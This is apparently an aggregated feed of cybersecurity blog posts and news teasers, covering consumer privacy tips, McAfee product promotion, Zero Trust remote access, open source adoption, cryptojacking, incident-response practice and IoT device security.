Antivirus is necessary for any computer connected to the internet. Moreover, modern antivirus programs are quite functional software, which also solves the problem of protecting the user’s personal data on the internet. Modern developers offer a choice of several effective antiviruses. Moreover, it can be free. Even free programs or demo versions of antiviruses that can be updated every month are quite suitable.

So, start with looking for a good antivirus solution, which often includes a set of identity protection features and secures your online activity.

What Do Hackers Usually Look For?

It’s clear why they are hacking media accounts: information about their personal lives can potentially cost a lot of money. But why hack the profile of an ordinary person? They have a lot of reasons.

Hackers are interested in the following:

  • Access to your credit cards;
  • Passwords from social networks are used for sending spam;
  • Access to your personal contact information allows them to profit by selling it to newsletters and advertising services;
  • Passwords from your accounts in games allow them to resell them to third parties or demand money from you to return your account;
  • With access to your profile on mobile devices, they collect your personal information and sell it to third parties or demand money for the return of a stolen profile.

In these and many other situations, you can prevent the negative outcome with thoughtful protection of personal data on the internet.

Take Care of Your Passwords

The easiest solution to the question of how to protect your data on the internet is to create a complex, difficult to guess a password for your accounts and mailboxes. Here are a few rules that will help you protect your account from hacking:

  • It would help if you did not make a password combination of personal data that is publicly available, such as last name, first name, date of birth, city, names of children, or your spouse.
  • Be sure to add not only lowercase and uppercase letters to the password but also numbers or other characters.
  • Do not store the password on the computer in a file, on a sticker glued to the monitor, on a sheet of paper hidden under the keyboard. They are well aware of all these places and will check them in the first place.
  • Try to use two-factor authentication, in which to enter your account, you must enter the secret code sent by the system to your phone.

Social Media Privacy

Another rule that in no case should be neglected by those who wondered how to protect personal data is the security of their social networks. Safe behavior out there makes no difficulties. The main thing is to follow a few simple rules:

  • Be careful not to share private details of life on social networks through private messages, and even more so on photos, even with loved ones. Remember that many dating sites do not guarantee user data safety, and dishonest citizens can get it.
  • Check your profile’s privacy settings. For example, on Facebook, you can look at your page through an outside visitor’s eyes.
  • Do not save passwords to social media even on your computer and especially on other people’s devices if you use them to access the internet. Do bother to enter the password again each time.
  • Try to select different passwords for accounts on various social media.

 

The post How to Secure Your Personal Data While Online? appeared first on .

Can your mobile phone be hacked by implanting bugs in Android?

If you’re among the many who own an Android phone, you must have by now downloaded the popular operating system’s latest security update (released on 5th May) by Google. The update fixes multiple vulnerabilities within the OS including CVE-2020-0103 which is the severest. This vulnerability could potentially allow remote code…

Creating an emergency ready cybersecurity program

A large part of the world’s workforce has transitioned to working remotely, but as plans are being drawn up to reopen economies, the security industry is being challenged to develop stronger screening practices, emergency operations planning, and to deploy tools to detect and minimize the impact that future pandemics, natural disasters and cyberattacks can have on a company. Things like global security operation centers (SOCs), managed security services, thermal imaging and temperature screening for on-site … More

The post Creating an emergency ready cybersecurity program appeared first on Help Net Security.

Maintaining the SOC in the age of limited resources

With COVID-19, a variety of new cyber risks have made their way into organizations as a result of remote working and increasingly sophisticated, opportunistic threats. As such, efficiency in the security operations center (SOC) is more critical than ever, as organizations have to deal with limited SOC resources. Limited SOC resources The SOC is a centralized team of analysts, engineers, and incident managers who are responsible for detecting, analyzing, and responding to incidents and keeping … More

The post Maintaining the SOC in the age of limited resources appeared first on Help Net Security.

23% of leading banks had an exposed database with potential data leakage

Reposify unveiled research findings of critical asset exposures and vulnerabilities in attack surfaces of the world’s leading multinational banks. Researchers measured the prevalence of exposed sensitive assets including exposed databases, remote login services, development tools and additional assets for 25 multinational banks and their 350+ subsidiaries. Banks deal with exposed database threat 23% of banks had at least one misconfigured database exposed to the internet resulting in potential data leakage issues 54% of the banks … More

The post 23% of leading banks had an exposed database with potential data leakage appeared first on Help Net Security.

GDPR enforcement over the past two years

Two years after the GDPR went into effect, official data show that Data Protection Authorities (DPAs), crippled by a lack of resources, tight budgets, and administrative hurdles, have not yet been able to create adequate GDPR enforcement. Worse, some public authorities have grossly misused the GDPR to undermine other fundamental rights such as the right to free expression and freedom of the press, Access Now reveals. The GDPR’s first two years have been marked by … More

The post GDPR enforcement over the past two years appeared first on Help Net Security.

Cool and Helpful McAfee Tech to Help Secure Your Online Life

These days, we’re all actively engaging onlineWhether it’s my kids scrolling through social media, my wife video chatting with her friends and online shopping, or me checking my emails, we’re all leveraging the devices in front of us to keep our lives moving forward.   

What many people don’t realize is that there are technologies that we can implement into our daily online routines that will not only help us achieve our digital tasks more effectively but safeguard our privacy as well. If there’s a way I can browse the internet more quickly and securely than before, I’m here for it!  

Tools Anyone Can Use

There are a lot of free and easy-to-use technologies out there that can benefit you – you just need to learn what they are first! With that, let’s explore cool technologies that not too many people may know about, which can positively impact your online life.  

Safe Browsing Solutions

The internet is a vast sea of content, both good and bad. And we’re all navigating that sea to learn, work, and socialize online. But when you’re trying to browse as efficiently as possible, it can be tricky to tell the safe websites from the suspicious ones. That’s where a security solution like McAfee® WebAdvisor comes in to play.  

McAfee® WebAdvisor can help keep you safe from online threats like malware and phishing attempts while you surf the web. For example, the tool places a checkmark next to all the safe links, making security decisions much easier for the everyday internet user, like my wife when she’s on a mission to shop online. And it is free too! 

Virtual Private Network (VPN)

Even the average internet surfer like you and me should consider using a Virtual Private Network (VPN), as it essentially allows you to send and receive data across a public network as if it were a private network. A VPN encrypts  or scrambles  your information so others cant read it, helping to safeguard your data. VPNs are especially handy for when you are working remote or if you want full access to the internet while you’re traveling, or if you simply want to protect your privacy. McAfee® Safe Connect is a great and affordable option (with a limited free version available too) for users who are looking for a solution that is not only easy to implement, but one that also provides bank-grade encryption and private browsing to protect all online activities 

Password Managers

Speaking of pesky passwords, another way to easily secure your online accounts is with a password manager. A password manager can help you create strong passwords, remove the hassle of remembering numerous passwords, and log you on to websites automatically. Who says staying secure has to be complicated? 

While many password managers are free, its important users do their research and adopt password managers from companies they trust. Another option? Some password managers also come included in a comprehensive security solution, like McAfee® Total Protection. 

Robocall Blocking Apps

At one time or another, you’ve probably experienced a mysterious phone call from an “Unknown Caller.” If you’ve ever actually bothered to pick up one of these calls, you’ve likely heard a strange, robotic voice on the other end claiming to be from a certain organization or asking you to take action. Whether the call itself is just annoying or is coming from a criminal looking to scam consumers out of cash or information, one thing is certain – robocalls are a huge headache.  

Unfortunately, these pesky phone calls have shown no signs of slowing down. In fact, it was recently reported that robocall scams surged to 85 million globally, up 325% from 2017. Luckily there are multiple robocall blocking apps and tools users can adopt to avoid phone spam. Additionally, you can register on the FCC’s National Do Not Call list for added protection. 

Multi-Factor Authentication

If you read my previous blog, you know that many of the common password habits that we use can lead to multiple security concerns. That said, passwords are just the first line of defense when it comes to securing online accounts – so what happens if a hacker makes it through that security barrier? Enter two-factor or multi-factor authentication.  

These days, most people have heard of two-factor authentication. To put it simply, the tech utilizes two checkpoints to verify the user’s identity. These could be answers to security questions, a one-time password texted to your smartphone, a fingerprint scan, or facial recognition. While two-factor authentication is a great starting point, there’s also multi-factor authentication – which, as it sounds, means a user must address multiple types of proof points before gaining access to an account or device. In fact, multi-factor authentication is becoming more and more intuitive thanks to artificial intelligence, as it can select a combination of authentication factors based on a user’s risk profile and habits.  

This technology is easy to integrate into your life, as it’s often a simple add-on to a lot of the things we already own. For example, you can activate face-ID on your iOS phone or fingerprint on your Android phone and boom, you’ve got two-factor authentication! 

Tools for Current McAfee Subscribers

Are you currently subscribed to McAfee® Total Protection or McAfee® LiveSafe? If so, there might be some cool tools within these solutions that you aren’t taking full advantage of that can help boost your security and improve your online experience. The more you know, right? 

For example, if you are a current McAfee® LiveSafe subscriber, you automatically have access to McAfee’s secure VPN and McAfee File Lock. If you are currently subscribed to McAfee® Total Protection, you have access to a whole host of security tools including a password manager and VPN. Additionally, McAfee® Total Protection gives you access to McAfee® Identity Theft Protectionwhich is a great tool for monitoring fraud. Finally, if you’re looking to delete some sensitive files, you can use McAfee® Shredder™ to completely ensure that no traces are left behind. By employing the full range of these tools, current McAfee subscribers can take their security to the next level and surf the internet without missing a beat.  

Cool Tech, Stronger Security

By taking advantage of these free, existing, and easily accessible tools, you can both improve every facet of your online life – whether that means social interactions, online shopping, or sending emails – and keep your information secure. You can have fun online and easily integrate security into your day-to-day which, in my opinion, is a win win. 

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post Cool and Helpful McAfee Tech to Help Secure Your Online Life appeared first on McAfee Blogs.

Durham College to participate in siberXchange Live summit

Durham College, a partner and sponsor of SiberX, is participating in the siberXchange Live Summit this week to showcase new opportunities in autonomous vehicle and cybersecurity research. 

Zero Trust and its role in securing the new normal

As the global crisis around COVID-19 continues, security teams have been forced to adapt to a rapidly evolving security landscape. Schools, businesses, and healthcare organizations are all getting work done from home on a variety of devices and locations, extending the potential security attack surface.

While we continue to help our customers enable secure access to apps in this “new normal,” we’re also thinking about the road ahead and how there are still many organizations who will need to adapt their security model to support work life. This is especially important given that bad actors are using network access solutions like VPN as a trojan horse to deploy ransomware and the number of COVID-19 themed attacks have increased and evolved.

Microsoft and Zscaler have partnered to provide a glimpse into how security will change in a post-COVID-19 world.

Accelerating to Zero Trust

“We’ve seen two years’ worth of digital transformation in two months.”
—Satya Nadella, CEO, Microsoft

With the bulk of end users now working remotely, organizations were forced to consider alternate ways of achieving modern security controls. Legacy network architectures route all remote traffic through a central corporate datacenter are suddenly under enormous strain due to massive demand for remote work and rigid appliance capacity limitations. This creates latency for users, impacting productivity and requires additional appliances that can take 30, 60, or even 90 days just to be shipped out.

To avoid these challenges many organizations were able to enable work from home by transitioning their existing network infrastructure and capabilities with a Zero Trust security framework instead.

The Zero Trust framework empowers organizations to limit access to specific apps and resources only to the authorized users who are allowed to access them. The integrations between Microsoft Azure Active Directory (Azure AD) and Zscaler Private Access embody this framework.

For the companies who already had proof of concept underway for their Zero Trust journey, COVID-19 served as an accelerator, moving up the timelines for adoption. The ability to separate application access from network access, and secure application access based on identity and user context, such as date/time, geolocation, and device posture, was critical for IT’s ability to enable remote work. Cloud delivered technologies such as Azure AD and Zscaler Private Access (ZPA) have helped ensure fast deployment, scalability, and seamless experiences for remote users.

Both Microsoft and Zscaler anticipate that if not already moving toward a Zero Trust model, organizations will accelerate this transition and start to adopt one.

Securing flexible work going forward

While some organizations have had to support remote workers in the past, many are now forced to make the shift from a technical and cultural standpoint. As social distancing restrictions start to loosen, instead of remote everything we’ll begin to see organizations adopt more flexible work arrangements for their employees. Regardless of where employees are, they’ll need to be able to securely access any application, including the mission-critical “crown jewel” apps that may still be using legacy authentication protocols like HTTP or LDAP and on-premises. To simplify the management of protecting access to apps from a now flexible working style, there should be a single policy per user that can be used to provide access to an application, whether they are remote or at the headquarters

Zscaler Private Access and Azure AD help organizations enable single sign-on and enforce Conditional Access policies to ensure authorized users can securely access specifically the apps they need. This includes their mission-critical applications that run on-premises and may have SOC-2 and ISO27001 compliance needs.

Today, the combination of ZPA and Azure AD are already helping organizations adopt flexible work arrangements to ensure seamless and secure access to their applications.

Secure access with Zscaler and Microsoft

Remote onboarding or offboarding for a distributed workforce

With remote and flexible work arrangements becoming a norm, organizations will need to consider how to best onboard or offboard a distributed workforce and ensure the right access can be granted when employees join, change or leave roles. To minimize disruption, organizations will need to enable and secure Bring Your Own Devices (BYOD) or leverage solutions like Windows Autopilot that can help users set up new devices without any IT involvement.

To ensure employees can access applications on day one, automating the provisioning of user accounts to applications will be critical for productivity. The SCIM 2.0 standard, adopted by both Microsoft and Zscaler, can help automate simple actions, such as creating or updating users, adding users to groups, or deprovisioning users into applications. Azure AD user provisioning can help manage end-to-end identity lifecycle and automate policy-based provisioning and deprovisioning of user accounts for applications. The ZPA + Azure AD SCIM 2.0 configuration guide shows how this works.

Powering security going forward

Security and IT teams are already under strain with this new environment and adding an impending economic downturn into the equation means they’ll need to do more with less. The responsibility of selecting the right technology falls to the security leaders. Together, Microsoft and Zscaler can help deliver secure access to applications and data on all the devices accessing your network, while empowering employees with simpler, more productive experiences. This is the power of cloud and some of the industry’s deepest level of integrations. We look forward to working with on what your security might look like after COVID-19.

Stay safe.

For more information on Microsoft Zero Trust, visit our website: Zero Trust security framework. Learn more about our guidance related to COVID-19 here and bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Zero Trust and its role in securing the new normal appeared first on Microsoft Security.

Why building backdoors into encryption won’t make us safer

For much of the last decade, technology companies have been in an uphill battle to save encryption, a battle that has seen an increasing number of skirmishes that tech companies often lose. Throughout this ongoing clash, governments across the world have been pushing to backdoor encryption in the name of combating child abuse and terrorism. The battle has come to a head several times in recent years, including when the FBI demanded Apple assist in … More

The post Why building backdoors into encryption won’t make us safer appeared first on Help Net Security.

How do I select a backup solution for my business?

42% of companies experienced a data loss event that resulted in downtime last year. That high number is likely caused by the fact that while nearly 90% are backing up the IT components they’re responsible for protecting, only 41% back up daily – leaving many businesses with gaps in the valuable data available for recovery. In order to select an appropriate backup solution for your business, you need to think about a variety of factors. … More

The post How do I select a backup solution for my business? appeared first on Help Net Security.

What hinders successful threat hunting?

As more organizations implement successful threat hunting operations, a SANS Institute survey finds that they are facing common challenges with employing skilled staff and collecting quality threat intelligence. “Without a sufficient number of skilled staff, high-quality intelligence, and the right tools to get visibility into the infrastructure, success with threat hunting will remain limited,” says survey author Mathias Fuchs. “A world where we’ll see a unified, widely accepted golden standard of threat hunting remains in … More

The post What hinders successful threat hunting? appeared first on Help Net Security.

Organizations plan to migrate most apps to the cloud in the next year

More than 88% percent of organizations use cloud infrastructure in one form or another, and 45% expect to migrate three quarters or more of their apps to the cloud over the next twelve months, according to the O’Reilly survey. The report surveyed 1,283 software engineers, technical leads, and decision-makers from around the globe. Of note, the report uncovered that 21% of organizations are hosting all applications in a cloud context. The report also found that … More

The post Organizations plan to migrate most apps to the cloud in the next year appeared first on Help Net Security.

Create a safe haven for your customers to build loyalty

“The customer comes first” started out as the secret to success in business. Now it’s the secret to 21st century cybersecurity and fraud prevention, too. The phrase always seemed more like an empty platitude, but a growing number of banks and other financial institutions now understand that optimizing convenient consumer experience with risk and safety across all their channels is a strategic differentiator. Dealing with fraudulent transactions Financial institutions have been on the lookout for … More

The post Create a safe haven for your customers to build loyalty appeared first on Help Net Security.

Integrating a SIEM solution in a large enterprise with disparate global centers

Security Information and Event Management (SIEM) systems combine two critical infosec abilities – information management and event management – to identify outliers and respond with appropriate measures. While information management deals with the collection of security data from across silos in the enterprise (firewalls, antivirus tools, intrusion detection, etc.), event management focuses on incidents that can pose a threat to the system – from benign human errors to malicious code trying to break in. Having … More

The post Integrating a SIEM solution in a large enterprise with disparate global centers appeared first on Help Net Security.

The dark web is flooded with offers to purchase corporate network access

There is a flood of interest in accessing corporate networks on the dark web, according to Positive Technologies. In Q1 2020, the number of postings advertising access to these networks increased by 69 percent compared to the previous quarter. This may pose a significant risk to corporate infrastructure, especially now that many employees are working remotely. “Access for sale” on the dark web is a generic term, referring to software, exploits, credentials, or anything else … More

The post The dark web is flooded with offers to purchase corporate network access appeared first on Help Net Security.

Build support for open source in your organization

Have you ever stared at the same lines of code for hours only to have a coworker identify a bug after just a quick glance? That’s the power of community! Open source software development is guided by the philosophy that a diverse community will produce higher quality code by allowing anyone to review and contribute. Individuals and large enterprises, like Microsoft, have embraced open source to engage people who can help make solutions better. However, not all open source projects are equivalent in quality or support. And, when it comes to security tools, many organizations hesitate to adopt open source. So how should you approach selecting and onboarding the right open source solutions for your organization? Why don’t we ask the community!

Earlier this year at the RSA 2020 Conference, I had the pleasure of sitting on the panel, Open Source: Promise, Perils, and the Path Ahead. Joining me were Inigo Merino, CEO of Cienaga Systems; Dr. Kelley Misata, CEO, Sightline Security; and Lenny Zeltser, CISO, Axonius. In addition to her role at Sightline Security, Kelley also serves as the President and Executive Director of the Open Information Security Foundation (OISF), which builds Suricata, an open source threat detection engine. Lenny created and maintains a Linux distribution called REMnux that organizations use for malware analysis. Ed Moyle, a Partner at SecurityCurve, served as the moderator. Today I’ll share our collective advice for selecting open source components and persuading organizations to approve them.

Which open source solutions are right for your project?

Nobody wants to reinvent the wheel—or should I say, Python—during a big project. You’ve got enough to do already! Often it makes sense to turn to pre-built open source components and libraries. They can save you countless hours, freeing up time to focus on the features that differentiate your product. But how should you decide when to opt for open source? When presented with numerous choices, how do you select the best open source solutions for your company and project? Here are some of the recommendations we discussed during the panel discussion.

  1. Do you have the right staff? A new environment can add complexity to your project. It helps if people on the team have familiarity with the tool or have time to learn it. If your team understands the code, you don’t have to wait for a fix from the community to address bugs. As Lenny said at the conference, “The advantage of open source is that you can get in there and see what’s going on. But if you are learning as you go, it may slow you down. It helps to have the knowledge and capability to support the environment.”
  2. Is the component widely adopted? If lots of developers are using the software, it’s more likely the code is stable. With more eyes on the code, problems get surfaced and resolved faster.
  3. How active is the community? Ideally, the library and components that you use will be maintained and enhanced for years after you deploy it, but there’s no guarantee—that’s also true for commercial options, by the way. An active community makes it more likely that the project will be supported. Check to see when the base was last updated. Confirm that members answer questions from users.
  4. Is there a long-term vision for the technology? Look for a published roadmap for the project. A roadmap will give you confidence that people are committed to supporting and enhancing the project. It will also help you decide if the open source project aligns with your product roadmap. “For us, a big signal is the roadmap. Does the community have a vision? Do they have a path to get there?” asked Kelley.
  5. Is there a commercial organization associated with the project? Another way to identify a project that is here for the long term is if there is a commercial interest associated with it. If a commercial company is providing funding or support to an open source project, it’s more likely that the support will continue even as community members change. Lenny told the audience, “If there is a commercial funding arm, that gives me peace of mind that the tool is less likely to just disappear.”

Getting legal (or executives or product owners) on board

Choosing the perfect open source solution for your project won’t help if you can’t persuade product owners, legal departments, or executives to approve it. Many organizations and individuals worry about the risks associated with using open source. They may wonder if legal issues will arise if they don’t use the software properly. If the software lacks support or includes security bugs will the component put the company at risk? The following tips can help you mitigate these concerns:

  1. Adopt change management methodologies: Organizational change is hard because the unknown feels riskier than the known. Leverage existing risk management structures to help your organization evaluate and adopt open source. Familiar processes will help others become more comfortable with new tools. As Inigo said, “Recent research shows that in order to get change through, you need to reduce the perceived risk of adopting said change. To lower those barriers, leverage what the organization already has in terms of governance to transform this visceral fear of the unknown into something that is known and can be managed through existing processes.”
  2. Implement component lifecycle management: Develop a process to determine which components are acceptable for people in your organization to use. By testing components or doing static and dynamic analysis, you reduce the level of risk and can build more confidence with executives.
  3. Identify a champion: If someone in your organization is responsible for mitigating concerns with product owners and legal teams, it will speed up the process.
  4. Enlist help from the open source project: Many open source communities include people who can help you make the business case to your approvers. As Kelley said, “It’s also our job in the open source community to help have these conversations. We can’t just sit passively by and let the enterprise folks figure it out. We need to evangelize our own message. There are many open source projects with people like Lenny and me who will help you make the case.”

Microsoft believes that the only way we can solve our biggest security challenges is to work together. Open source is one way to do that. Next time you look for an open source solution consider trying today’s tips to help you select the right tools and gain acceptance in your organization.

Learn more

Next month, I’ll follow up this post with more details on how to implement component lifecycle management at your organization.

In the meantime, explore some of Microsoft’s open source solutions, such as The Microsoft Graph Toolkit, DeepSpeed, misticpy, and Attack Surface Analyzer.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Or reach out to me on LinkedIn or Twitter.

The post Build support for open source in your organization appeared first on Microsoft Security.

The missing link in your SOC: Secure the mainframe

How confident are you that your security visibility covers every critical corner of your infrastructure? A good SIEM solution will pull data across firewalls, servers, routers, and endpoint devices. But what if there is even one gap—one piece of equipment that can’t be monitored but contains business critical data? That sounds like a glaring hole in the vision of your SOC, doesn’t it? Especially if it can be exploited by hackers, malicious insiders, or simply … More

The post The missing link in your SOC: Secure the mainframe appeared first on Help Net Security.

What do IGA solutions have in common with listening to music anywhere?

Fifteen years ago, there was a revolution in personal music players. The market had slowly evolved from the Walkman to the Discman, when a bolt of innovation brought the MP3 player. Finally, the solution to having all of one’s music anywhere was solved with a single device, not a device plus a bag full of whatever physical media was popular at that time. History clearly shows that the iPod and a few of its competitors … More

The post What do IGA solutions have in common with listening to music anywhere? appeared first on Help Net Security.

How secure are open source libraries?

Seven in 10 applications have a security flaw in an open source library, highlighting how use of open source can introduce flaws, increase risk, and add to security debt, a Veracode research reveals. Nearly all modern applications, including those sold commercially, are built using some open source components. A single flaw in one library can cascade to all applications that leverage that code. According to Chris Eng, Chief Research Officer at Veracode, “Open source software … More

The post How secure are open source libraries? appeared first on Help Net Security.

Understanding How Bitcoin Mining Poses Security Risks

The value of Bitcoin has had its ups and downs over the past several years, but continues to attract interest in the midst of a chaotic market. The rapid growth of this alternate currency has dominated headlines and ignited a cryptocurrency boom that left consumers everywhere wondering how to get a slice of the Bitcoin pie. For those that want to join the craze without trading traditional currencies like U.S. dollars, a process called “Bitcoin mining” appears to be a great way to get involved. However, Bitcoin mining introduces a number of security risks.

What is Bitcoin mining?

Mining for Bitcoin is like mining for gold—you put in the work and you get your reward. But instead of back-breaking labor, you earn the currency with your time and computer processing power. “Miners”, as they are called, essentially upkeep and help secure Bitcoin’s decentralized accounting system.

Each time there’s a transaction it’s recorded in a digital ledger called the “blockchain.” Miners help to update the ledger by downloading a special piece of software that allows them to verify and collect new transactions to be added to the blockchain. Then, they must solve a mathematical puzzle to be able to add a block of transactions to the chain. In return, they earn Bitcoins, as well as transaction fees.

What are the security risks?

As the digital currency has matured, Bitcoin mining has become more challenging. In the beginning a user could mine on their home computer and earn a good amount of the digital currency, but these days the math problems have become so complicated that it requires a lot of expensive computing power.

This is where the risks come in. Since miners need an increasing amount of computer power to earn Bitcoin, some have started compromising public Wi-Fi networks so they can access users’ devices to mine for Bitcoin.  Such an event happened at a coffee shop in Buenos Aires, which was infected with malware that caused a 10-second delay when logging in to the cafe’s Wi-Fi network. The malware authors were using this time to access the users’ laptops for mining.

In addition to public Wi-Fi networks, millions of websites are being compromised to access users’ devices for mining. In fact, this has become such a widespread problem, that over 1 billion devices are believed to be slowed down by web-based mining. And slowing your device down is not even the worst thing that could happen. A device that is “cryptojacked” could have 100 percent of its resources used for mining, causing the device to overheat, essentially destroying it.

Now that you know a little about Bitcoin mining and the risks associated with it, here are some tips to keep your devices safe as you monitor the cryptocurrency market:

  • Avoid public Wi-Fi networks—These networks often aren’t secured, opening your device and information up to a number of threats.
  • Use a VPN— If you’re away from your secure home or work network, consider using a virtual private network (VPN). This is a piece of software that gives you a secure connection to the Internet, so that third parties cannot intercept or read your data. A product like McAfee Safe Connect can help safeguard your online privacy no matter where you go.
  • Secure Your Devices—New threats like Bitcoin malware are emerging all of the time. Protect your devices and information with comprehensive security software, and keep informed on the latest threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post Understanding How Bitcoin Mining Poses Security Risks appeared first on McAfee Blogs.

Only 36% of critical infrastructures have a high level of cyber resilience

Greenbone Networks revealed the findings of a research assessing critical infrastructure providers’ ability to operate during or in the wake of a cyberattack. The cyber resilience of critical infrastructures The research investigated the cyber resilience of organizations operating in the energy, finance, health, telecommunications, transport and water industries, located in the world’s five largest economies: UK, US, Germany, France and Japan. Of the 370 companies surveyed, only 36 percent had achieved a high level of … More

The post Only 36% of critical infrastructures have a high level of cyber resilience appeared first on Help Net Security.

Adam Levin Discusses Covid-19 Scams on CNBC

Adam Levin was featured on CNBC where he discussed how the Covid-19 pandemic has created an ideal environment for scammers.

“We are working with our children and home schooling. We’re sharing devices with our children. We’re trying to juggle work and family. But to a hacker, we are their day job,” said Levin.

The post Adam Levin Discusses Covid-19 Scams on CNBC appeared first on Adam Levin.

Success in security: reining in entropy

Your network is unique. It’s a living, breathing system evolving over time. Data is created. Data is processed. Data is accessed. Data is manipulated. Data can be forgotten. The applications and users performing these actions are all unique parts of the system, adding degrees of disorder and entropy to your operating environment. No two networks on the planet are exactly the same, even if they operate within the same industry, utilize the exact same applications, and even hire workers from one another. In fact, the only attribute your network may share with another network is simply how unique they are from one another.

If we follow the analogy of an organization or network as a living being, it’s logical to drill down deeper, into the individual computers, applications, and users that function as cells within our organism. Each cell is unique in how it’s configured, how it operates, the knowledge or data it brings to the network, and even the vulnerabilities each piece carries with it. It’s important to note that cancer begins at the cellular level and can ultimately bring down the entire system. But where incident response and recovery are accounted for, the greater the level of entropy and chaos across a system, the more difficult it becomes to locate potentially harmful entities. Incident Response is about locating the source of cancer in a system in an effort to remove it and make the system healthy once more.

Let’s take the human body for example. A body that remains at rest 8-10 hours a day, working from a chair in front of a computer, and with very little physical activity, will start to develop health issues. The longer the body remains in this state, the further it drifts from an ideal state, and small problems begin to manifest. Perhaps it’s diabetes. Maybe it’s high blood pressure. Or it could be weight gain creating fatigue within the joints and muscles of the body. Your network is similar to the body. The longer we leave the network unattended, the more it will drift from an ideal state to a state where small problems begin to manifest, putting the entire system at risk.

Why is this important? Let’s consider an incident response process where a network has been compromised. As a responder and investigator, we want to discover what has happened, what the cause was, what the damage is, and determine how best we can fix the issue and get back on the road to a healthy state. This entails looking for clues or anomalies; things that stand out from the normal background noise of an operating network. In essence, let’s identify what’s truly unique in the system, and drill down on those items. Are we able to identify cancerous cells because they look and act so differently from the vast majority of the other healthy cells?

Consider a medium-size organization with 5,000 computer systems. Last week, the organization was notified by a law enforcement agency that customer data was discovered on the dark web, dated from two weeks ago. We start our investigation on the date we know the data likely left the network. What computer systems hold that data? What users have access to those systems? What windows of time are normal for those users to interact with the system? What processes or services are running on those systems? Forensically we want to know what system was impacted, who was logging in to the system around the timeframe in question, what actions were performed, where those logins came from, and whether there are any unique indicators. Unique indicators are items that stand out from the normal operating environment. Unique users, system interaction times, protocols, binary files, data files, services, registry keys, and configurations (such as rogue registry keys).

Our investigation reveals a unique service running on a member server with SQL Server. In fact, analysis shows that service has an autostart entry in the registry and starts the service from a file in the c:\windows\perflogs directory, which is an unusual location for an autostart, every time the system is rebooted. We haven’t seen this service before, so we investigate against all the systems on the network to locate other instances of the registry startup key or the binary files we’ve identified. Out of 5,000 systems, we locate these pieces of evidence on only three systems, one of which is a Domain Controller.

This process of identifying what is unique allows our investigative team to highlight the systems, users, and data at risk during a compromise. It also helps us potentially identify the source of attacks, what data may have been pilfered, and foreign Internet computers calling the shots and allowing access to the environment. Additionally, any recovery efforts will require this information to be successful.

This all sounds like common sense, so why cover it here? Remember we discussed how unique your network is, and how there are no other systems exactly like it elsewhere in the world? That means every investigative process into a network compromise is also unique, even if the same attack vector is being used to attack multiple organizational entities. We want to provide the best foundation for a secure environment and the investigative process, now, while we’re not in the middle of an active investigation.

The unique nature of a system isn’t inherently a bad thing. Your network can be unique from other networks. In many cases, it may even provide a strategic advantage over your competitors. Where we run afoul of security best practice is when we allow too much entropy to build upon the network, losing the ability to differentiate “normal” from “abnormal.” In short, will we be able to easily locate the evidence of a compromise because it stands out from the rest of the network, or are we hunting for the proverbial needle in a haystack? Clues related to a system compromise don’t stand out if everything we look at appears abnormal. This can exacerbate an already tense response situation, extending the timeframe for investigation and dramatically increasing the costs required to return to a trusted operating state.

To tie this back to our human body analogy, when a breathing problem appears, we need to be able to understand whether this is new, or whether it’s something we already know about, such as asthma. It’s much more difficult to correctly identify and recover from a problem if it blends in with the background noise, such as difficulty breathing because of air quality, lack of exercise, smoking, or allergies. You can’t know what’s unique if you don’t already know what’s normal or healthy.

To counter this problem, we pre-emptively bring the background noise on the network to a manageable level. All systems move towards entropy unless acted upon. We must put energy into the security process to counter the growth of entropy, which would otherwise exponentially complicate our security problem set. Standardization and control are the keys here. If we limit what users can install on their systems, we quickly notice when an untrusted application is being installed. If it’s against policy for a Domain Administrator to log in to Tier 2 workstations, then any attempts to do this will stand out. If it’s unusual for Domain Controllers to create outgoing web traffic, then it stands out when this occurs or is attempted.

Centralize the security process. Enable that process. Standardize security configuration, monitoring, and expectations across the organization. Enforce those standards. Enforce the tenet of least privilege across all user levels. Understand your ingress and egress network traffic patterns, and when those are allowed or blocked.

In the end, your success in investigating and responding to inevitable security incidents depends on what your organization does on the network today, not during an active investigation. By reducing entropy on your network and defining what “normal” looks like, you’ll be better prepared to quickly identify questionable activity on your network and respond appropriately. Bear in mind that security is a continuous process and should not stop. The longer we ignore the security problem, the further the state of the network will drift from “standardized and controlled” back into disorder and entropy. And the further we sit from that state of normal, the more difficult and time consuming it will be to bring our network back to a trusted operating environment in the event of an incident or compromise.

The post Success in security: reining in entropy appeared first on Microsoft Security.

Cybersecurity best practices to implement highly secured devices

Almost three years ago, we published The Seven Properties of Highly Secured Devices, which introduced a new standard for IoT security and argued, based on an analysis of best-in-class devices, that seven properties must be present on every standalone device that connects to the internet in order to be considered secured. Azure Sphere, now generally available, is Microsoft’s entry into the market: a seven-properties-compliant, end-to-end product offering for building and deploying highly secured IoT devices.

Every connected device should be highly secured, even devices that seem simplistic, like a cactus watering sensor. The seven properties are always required. These details are captured in a new paper titled, Nineteen cybersecurity best practices used to implement the seven properties of highly secured devices in Azure Sphere. It focuses on why the seven properties are always required and describes best practices used to implement Azure Sphere. The paper provides detailed information about the architecture and implementation of Azure Sphere and discusses design decisions and trade-offs. We hope that the new paper can assist organizations and individuals in evaluating the measures used within Azure Sphere to improve the security of IoT devices. Companies may also want to use this paper as a reference, when assessing Azure Sphere or other IoT offerings.  In this blog post, we discuss one issue covered in the paper: why are the 7 properties always required?

Why are the seven properties applicable to every device that connects to the internet?

If an internet-connected device performs a non-critical function, why does it require all seven properties? Put differently, are the seven properties required only when a device might cause harm if it is hacked? Why would you still want to require an advanced CPU, a security subsystem, a hardware root of trust, and a set of services to secure a simple, innocuous device like a cactus water sensor?

Because any device can be the target of a hacker, and any hacked device can be weaponized.

Consider the Mirai botnet, a real-world example of IoT gone wrong. The Mirai botnet involved approximately 150,000 internet-enabled security cameras. The cameras were hacked and turned into a botnet that launched a distributed denial of service (DDoS) attack that took down internet access for a large portion of the eastern United States. For security experts analyzing this hack, the Mirai botnet was distressingly unsophisticated. It was also a relatively small-scale attack, considering that many IoT devices will sell more than 150,000 units.

